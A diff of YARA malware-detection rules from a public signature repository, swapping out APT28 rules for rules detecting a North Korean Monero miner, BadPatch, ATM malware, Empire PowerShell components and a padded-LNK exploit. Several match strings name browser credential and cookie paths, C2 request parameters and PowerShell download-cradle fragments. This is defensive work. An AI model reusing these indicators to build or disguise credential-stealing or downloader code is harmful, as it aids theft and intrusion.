-		date = "2015-06-01"
+		description = "Detects Noth Korean Monero Miner mentioned in AlienVault report"
+		author = "Florian Roth (Nextron Systems) (original rule by Chris Doman)"
+		id = "40f53c36-9e14-5307-9740-e6f514afc7ec"
+		date = "2018-01-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L34-L50"
+		reference = "https://goo.gl/PChE1z"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_nkminer.yar#L11-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ec1e5db74b5abe1da0d454b5e901bd808a0be318235f25d713cfdc4aea8d6d7"
-		score = 60
+		logic_hash = "eb75fe7d70b547a4774b74c01e11479949dfccb8645af330f87b51daaf0d8dbf"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
-		hash2 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
+		hash1 = "0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3"
+		hash2 = "42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76"
 
 	strings:
-		$s0 = "coreshell.dll" fullword wide
-		$s1 = "Core Shell Runtime Service" fullword wide
-		$s2 = "\\chkdbg.log" wide
+		$x0 = "c:\\users\\jawhar\\documents\\" ascii
+		$x1 = "C:\\Users\\Jawhar\\documents\\" ascii
+		$x2 = "The number of processors on this computer is {0}." fullword wide
+		$x3 = { 00 00 1F 43 00 3A 00 5C 00 4E 00 65 00 77 00 44
+              00 69 00 72 00 65 00 63 00 74 00 6F 00 72 00 79
+              00 00 }
+		$x4 = "Le fichier Hello txt n'existe pas" fullword wide
+		$x5 = "C:\\NewDirectory2\\info2" fullword wide
+		$a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii
+		$b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii
+		$c = "barjuok.ryongnamsan.edu.kp" wide ascii
+		$d = "C:\\SoftwaresInstall\\soft" wide ascii
+		$e = "C:\\Windows\\Sys64\\intelservice.exe" wide ascii
+		$f = "C:\\Windows\\Sys64\\updater.exe" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_APT28_Sourface_Malware2 : FILE
+rule SIGNATURE_BASE_CHAOS_Payload : FILE
 {
 	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+		description = "Detects a CHAOS back connect payload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8a9df742-82c1-56bb-ab70-6384403f70b5"
-		date = "2015-06-01"
+		id = "5057bc68-9bf8-54b4-88a1-d0c0cba62fa0"
+		date = "2017-07-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L52-L72"
+		reference = "https://github.com/tiagorlampert/CHAOS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_chaos_payload.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed0424e61ca3243241e32d4f744398d263d7e35de15d94e9c6f816dc7349c267"
-		score = 60
+		logic_hash = "ca409d3d0430fbc4c5ae52ce22616132da3a90c1ec3889571c6314e8787eee67"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash0 = "367d40465fd1633c435b966fa9b289188aa444bc"
-		hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
-		hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
-		hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
-		hash4 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
-		hash5 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0962fcfcb1b52df148720c2112b036e75755f09279e3ebfce1636739af9b4448"
+		hash2 = "5c3553345f824b7b6de09ccb67d834e428b8df17443d98816471ca28f5a11424"
 
 	strings:
-		$s0 = "coreshell.dll" fullword ascii
-		$s1 = "Applicate" fullword ascii
+		$x1 = { 2F 43 48 41 4F 53 00 02 73 79 6E 63 2F 61 74 6F 6D 69 63 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_APT28_Sourface_Malware3 : FILE
+rule SIGNATURE_BASE_SUSP_BAT2EXE_Bdargo_Converted_BAT : FILE
 {
 	meta:
-		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
+		description = "Detects binaries created with BDARGO Advanced BAT to EXE converter"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b49843b9-3a54-5525-958e-ac545cc00bde"
-		date = "2015-06-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L74-L98"
+		id = "c9da4184-1530-5525-bdba-2dcc8a221bb1"
+		date = "2018-07-28"
+		modified = "2022-06-23"
+		reference = "https://www.majorgeeks.com/files/details/advanced_bat_to_exe_converter.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_bat2exe.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "894fc2913cf1fa8aecb3052e762d4403124fcbdb2148edb23a9117c2f2b8eddc"
-		score = 60
+		logic_hash = "978aa25f1abd0cbd36e55da2b1ed4478a3a5b8b814988669c70e219cc2dd1afd"
+		score = 45
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash0 = "85522190958c82589fa290c0835805f3d9a2f8d6"
-		hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
-		hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
-		hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
-		hash4 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
-		hash5 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
-		hash6 = "682e49efa6d2549147a21993d64291bfa40d815a"
-		hash7 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
-		hash8 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
-		hash9 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d428d79f58425d831c2ee0a73f04749715e8c4dd30ccd81d92fe17485e6dfcda"
+		hash1 = "a547a02eb4fcb8f446da9b50838503de0d46f9bb2fd197c9ff63021243ea6d88"
 
 	strings:
-		$s0 = "coreshell.dll" fullword wide
-		$s1 = "Core Shell Runtime Service" fullword wide
+		$s1 = "Error #bdembed1 -- Quiting" fullword ascii
+		$s2 = "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s3 = "\\a.txt" ascii
+		$s4 = "command.com" fullword ascii
+		$s6 = "DFDHERGDCV" fullword ascii
+		$s7 = "DFDHERGGZV" fullword ascii
+		$s8 = "%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 5 of them
 }
-rule SIGNATURE_BASE_APT28_Skinnyboy_Dropper : RUSSIA FILE
+rule SIGNATURE_BASE_Winagent_Badpatch_1 : FILE
 {
 	meta:
-		description = "Detects APT28 SkinnyBoy droppers"
-		author = "Cluster25"
-		id = "ed0b2d2b-f820-57b5-9654-c24734d81996"
-		date = "2021-05-24"
-		modified = "2023-12-05"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L103-L118"
+		description = "Detects samples mentioned in BadPatch report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "732792ed-cb70-5b69-8457-f54177e4609e"
+		date = "2017-10-20"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RvDwwA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bad_patch.yar#L11-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9e29ed985fac8701f72f0860fe101272c3c3342ef6857e30d32f5fea14822945"
+		logic_hash = "568086edb8884877f9dcb0cffa1e4c05164e6884bf80ce50692cedfa3e8d5750"
 		score = 75
 		quality = 85
-		tags = "RUSSIA, FILE"
-		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813"
 
 	strings:
-		$ = "cmd /c DEL " ascii
-		$ = {8a 08 40 84 c9 75 f9}
-		$ = {0f b7 84 0d fc fe ff ff 66 31 84 0d fc fd ff ff}
+		$x1 = "J:\\newPatch\\downloader\\" wide
+		$x2 = "L:\\rashed\\New code\\" wide
+		$x3 = ":\\newPatch\\last version\\" wide
+		$x4 = "\\Microsoft\\Microsoft\\Microsoft1.log" wide
+		$x5 = "\\Microsoft\\Microsoft\\Microsoft.log" wide
+		$x6 = "\\Microsoft\\newPP.exe" wide
+		$x7 = " (this is probably a proxy server error)." fullword wide
+		$x8 = " :Old - update patch and check anti-virus.. " fullword wide
+		$x9 = "PatchNotExit-- download now.. " fullword wide
+		$x10 = "PatchNotExit-- Check Version" fullword wide
+		$x11 = "PatchNotExit-- Version Patch" fullword wide
+		$s1 = "downloader " fullword wide
+		$s2 = "DelDownloadFile" fullword ascii
+		$s3 = "downloadFile" fullword ascii
+		$s4 = "downloadUpdate" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of them ) )
 }
-rule SIGNATURE_BASE_APT28_Skinnyboy_Launcher : RUSSIA FILE
+rule SIGNATURE_BASE_Winagent_Badpatch_2 : FILE
 {
 	meta:
-		description = "Detects APT28 SkinnyBoy launchers"
-		author = "Cluster25"
-		id = "eaf4e8e5-cbec-5000-a2ff-31d1dac4c30f"
-		date = "2021-05-24"
+		description = "Detects samples mentioned in BadPatch report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "648528f0-351c-527e-b516-2c8cae9fb4a3"
+		date = "2017-10-20"
 		modified = "2023-12-05"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L120-L141"
+		reference = "https://goo.gl/RvDwwA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bad_patch.yar#L41-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbb7a6e0114a9556a99ab3f5601664f430b650b2de0b44fe0178a99f21082e8d"
+		logic_hash = "649cfca8fa9d3b9f12b56fd81d4133a00eb5449e67fca2abe85fbfb778912df8"
 		score = 75
 		quality = 85
-		tags = "RUSSIA, FILE"
-		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea"
+		hash2 = "ece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7"
+		hash3 = "cf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876"
+		hash4 = "802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2"
+		hash5 = "278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d"
+		hash6 = "2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e"
+		hash7 = "46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0"
+		hash8 = "27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247"
+		hash9 = "050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c"
 
 	strings:
-		$sha = {F4 EB 56 52 AF 4B 48 EE 08 FF 9D 44 89 4B D5 66 24 61 2A 15 1D 58 14 F9 6D 97
-      13 2C 6D 07 6F 86}
-		$l1 = "CryptGetHashParam" ascii
-		$l2 = "CryptCreateHash" ascii
-		$l3 = "FindNextFile" ascii
-		$l4 = "PathAddBackslashW" ascii
-		$l5 = "PathRemoveFileSpecW" ascii
-		$h1 = {50 6A 00 6A 00 68 0C 80 00 00 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A 00
-      56 ?? ?? ?? ?? 50 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ??}
-		$h2 = {8B 01 3B 02 75 10 83 C1 04 83 C2 04 83 EE 04 73 EF}
+		$s1 = "myAction=shell_result&serialNumber=" fullword wide
+		$s2 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.*" wide
+		$s3 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide
+		$s4 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.*" wide
+		$s5 = "newSHELL[" fullword wide
+		$s6 = "\\file1.txt" wide
+		$s7 = "myAction=newGIF&serialNumber=" fullword wide
+		$s8 = "\\Storege1" wide
+		$s9 = "\\Microsoft\\mac.txt" wide
+		$s10 = "spytube____:" fullword ascii
+		$s11 = "0D0700045F5C5B0312045A04041F40014B1D11004A1F19074A141100011200154B031C04" fullword wide
+		$s12 = "16161A1000012B162503151851065A1A0007" fullword wide
+		$s13 = "-- SysFile...." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( $sha or ( all of ( $l* ) and all of ( $h* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 3 of them )
 }
-
-rule SIGNATURE_BASE_APT28_Skinnyboy_Implanter : RUSSIA FILE
+rule SIGNATURE_BASE_ATM_Malware_Javadispcash_1 : FILE
 {
 	meta:
-		description = "Detects APT28 SkinnyBoy implanter"
-		author = "Cluster25"
-		id = "c44faf95-a64c-58f4-97d4-2fe17aefc813"
-		date = "2021-05-24"
+		description = "Detects ATM Malware JavaDispCash"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "7aa91719-6539-572a-8618-bfb5290a5b59"
+		date = "2019-03-28"
 		modified = "2023-12-05"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L143-L159"
+		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_javadipcash.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f5b8944910297988ecf5aecf23d20c384cf141a3a0972baadfacc4969dc46e7c"
+		logic_hash = "9a714571281844cfe7193b7c183b86b797ef5de5d1922eacaf45dad8d41cfc52"
 		score = 75
 		quality = 85
-		tags = "RUSSIA, FILE"
-		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
+		tags = "FILE"
+		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
+		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
 
 	strings:
-		$enc_string = {F3 0F 7E 05 ?? ?? ?? ?? 6? [5] 6A ?? 66 [6] 66 [7] F3 0F 7E 05 ?? ?? ?? ?? 8D
-      85 [4] 6A ?? 50 66 [7] E8}
-		$heap_ops = {8B [1-5] 03 ?? 5? 5? 6A 08 FF [1-6] FF ?? ?? ?? ?? ?? [0-6] 8B ?? [0-6] 8?}
-		$xor_cycle = { 8A 8C ?? ?? ?? ?? ?? 30 8C ?? ?? ?? ?? ?? 42 3B D0 72 }
+		$CashInfo = "getNumberOfCashUnits" ascii wide
+		$Dispense = "waitforbillstaken" ascii wide
+		$Inject = "No code to inject!" ascii wide
+		$config = ".Agentcli" ascii wide
+		$log1 = "logft.log" ascii wide
+		$log2 = ".loginside" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and filesize < 100KB and $xor_cycle and $heap_ops and $enc_string
+		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_Xored_URL_In_EXE : FILE
+rule SIGNATURE_BASE_EXT_EXPL_ZTH_LNK_EXPLOIT_A : FILE
 {
 	meta:
-		description = "Detects an XORed URL in an executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f83991c8-f2d9-5583-845a-d105034783ab"
-		date = "2020-03-09"
-		modified = "2022-09-16"
-		reference = "https://twitter.com/stvemillertime/status/1237035794973560834"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_xor.yar#L4-L43"
+		description = "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373."
+		author = "Peter Girnus"
+		id = "14788504-64e3-533b-ad21-00a3462a33cc"
+		date = "2025-03-18"
+		modified = "2025-03-29"
+		reference = "https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_lnk_zdi_can_25373.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2113324ae04a9022be4cf5c615ad231206eeefb5aa87a2236ec3c9deee9e7ec2"
-		score = 50
+		logic_hash = "b2c6a7f0abd62d3eef916352f984d1fcc721cfba4f5de9d159de8fd428c02b31"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "http://" xor
-		$s2 = "https://" xor
-		$f1 = "http://" ascii
-		$f2 = "https://" ascii
-		$fp01 = "3Com Corporation" ascii
-		$fp02 = "bootloader.jar" ascii
-		$fp03 = "AVAST Software" ascii wide
-		$fp04 = "smartsvn" wide ascii fullword
-		$fp05 = "Avira Operations GmbH" wide fullword
-		$fp06 = "Perl Dev Kit" wide fullword
-		$fp07 = "Digiread" wide fullword
-		$fp08 = "Avid Editor" wide fullword
-		$fp09 = "Digisign" wide fullword
-		$fp10 = "Microsoft Corporation" wide fullword
-		$fp11 = "Microsoft Code Signing" ascii wide
-		$fp12 = "XtraProxy" wide fullword
-		$fp13 = "A Sophos Company" wide
-		$fp14 = "http://crl3.digicert.com/" ascii
-		$fp15 = "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl" ascii
-		$fp16 = "HitmanPro.Alert" wide fullword
+		$spoof_a = {20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00}
+		$spoof_b = {09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00}
+		$spoof_c = {0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00 0A 00}
+		$spoof_d = {0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00 0D 00}
+		$spoof_e = {11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00 11 00}
+		$spoof_f = {12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00 12 00}
+		$spoof_g = {13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00 13 00}
+		$spoof_h = {0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00 0D 00 0A 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( ( $s1 and #s1 > #f1 ) or ( $s2 and #s2 > #f2 ) ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		uint32( 0 ) == 0x4C and uint32( 4 ) == 0x21401 and any of ( $spoof_* )
 }
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_03_Clientuploader_Dec21 : FILE
+rule SIGNATURE_BASE_SUSP_Email_Redirection_Spoofing_Feb25
 {
 	meta:
-		description = "Detects ClientUploader onedrv"
-		author = "CISA Code & Media Analysis"
-		id = "4eeadb28-9312-5602-932a-36acb48772f4"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L4-L23"
+		description = "Detects redirect spoofing in embedded URLs. This technique is used by threat actors to obscure the actual destination of a link"
+		author = "Jonathan Peters (cod3nym)"
+		id = "bf3a2b06-4dc5-5f0f-bf1f-2bd6a1cc4a8d"
+		date = "2025-02-20"
+		modified = "2025-03-20"
+		reference = "https://any.run/cybersecurity-blog/cyber-attacks-january-2025/#fake-youtube-links-redirect-users-to-phishing-pages-11298"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_email_redirection_spoofing.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76f552b2416ae2426b73a321485f34a611c2a3c1ca35791bc9f1834072dc28be"
-		score = 80
+		hash = "9b196220b369c199a7e4d57cb5db18b32eb2565a6f9190929c5c01ac4fa04ac8"
+		hash = "c4eb35c1a1c10226bff9bb0c88ca516441208d193b4994eeb292a66e53a2cc04"
+		hash = "e3b8ea03a472348814c6ac81088234836e627a1878ec36e46ce62526e1390935"
+		logic_hash = "9a411317821751dc0873fe3163791115d1e19bc4d57119ed2ba513b444864032"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "84164e1e8074c2565d3cd178babd93694ce54811641a77ffdc8d1084dd468afb"
+		tags = ""
 
 	strings:
-		$s1 = "Decoder2"
-		$s2 = "ClientUploader"
-		$s3 = "AppDomain"
-		$s4 = { 5F 49 73 52 65 70 47 ?? 44 65 63 6F 64 65 72 73 }
-		$s5 = "LzmaDecoder"
-		$s6 = "$ee1b3f3b-b13c-432e-a461-e52d273896a7"
+		$sa1 = "Content-Transfer-Encoding:" ascii
+		$sa2 = "Subject:" ascii
+		$x = ".com%20%20%20%20%20%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_01_APPSTORAGE_Dec21 : APPSTORAGE FILE
+rule SIGNATURE_BASE_Empire_Invoke_Metasploitpayload : FILE
 {
 	meta:
-		description = "Detects AppStorage ntstatus msexch samples"
-		author = "CISA Code & Media Analysis"
-		id = "a44c5609-980f-5961-921c-6b1824cdd49c"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L25-L46"
+		description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "608c30b0-826a-55b1-afb8-756b476d6b55"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a46bc4efa1f22d9fc65d946dbaa7b94de6074e65c228373bb6001f152d5b603"
-		score = 80
+		logic_hash = "1399818f71544245a7b689a7eb4da794b10814590e4c5f545fc28237ffa3d0f6"
+		score = 75
 		quality = 85
-		tags = "APPSTORAGE, FILE"
-		family = "APPSTORAGE"
-		hash1 = "157a0ffd18e05bfd90a4ec108e5458cbde01015e3407b3964732c9d4ceb71656"
-		hash2 = "30191b3badf3cdbc65d0ffeb68e0f26cef10a41037351b0f562ab52fce7432cc"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
 
 	strings:
-		$s1 = "026B924DD52F8BE4A3FEE8575DC"
-		$s2 = "GetHDDId"
-		$s3 = "AppStorage"
-		$s4 = "AppDomain"
-		$s5 = "$1e3e5580-d264-4c30-89c9-8933c948582c"
-		$s6 = "hrjio2mfsdlf235d" wide
+		$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
+		$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CISA_10365227_02_Clientuploader_Dec21 : FILE
+rule SIGNATURE_BASE_Empire_Exploit_Jenkins : FILE
 {
 	meta:
-		description = "Detects ClientUploader_mqsvn"
-		author = "CISA Code & Media Analysis"
-		id = "84351df9-e225-5c3f-9385-523246681a97"
-		date = "2021-12-23"
-		modified = "2021-12-24"
-		reference = "https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stealer_cisa_ar22_277a.yar#L48-L67"
+		description = "Detects Empire component - file Exploit-Jenkins.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
